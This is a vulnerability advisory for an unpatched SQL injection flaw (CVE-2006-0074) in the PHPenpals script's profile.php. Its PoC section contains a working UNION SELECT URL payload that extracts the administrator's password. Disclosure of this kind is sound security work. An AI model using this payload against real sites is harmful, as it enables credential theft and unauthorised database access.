SQL Injection Vulnerability in PHPenpals

Summary

Vulnerability: SQL Injection Vulnerability in PHPenpals
Discovered: 2005.12.29
Last Update: 0 n/a
ID: EV0005
CVE: CVE-2006-0074
Risk Level: medium
Type: SQL Injection
Status: Unpatched
Vendor: Jevontec (http://jevontech.com/)
Vulnerable Software: PHPenpals
Version: 310704
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in PHPenpals script.

Vulnerable scripts: profile.php

Variable $personalID isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

PoC/Exploit

Administrator's password:
http://host/phpenpals/profile.php? personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/*

Solution.

Solution for "SQL Injection Vulnerability in PHPenpals" is not available. Check Jevontec website for updates.

SQL Injection Vulnerability in PHPenpals

Summary

Description

PoC/Exploit

Solution.

Company

Services

eVuln Labs

eVuln Tools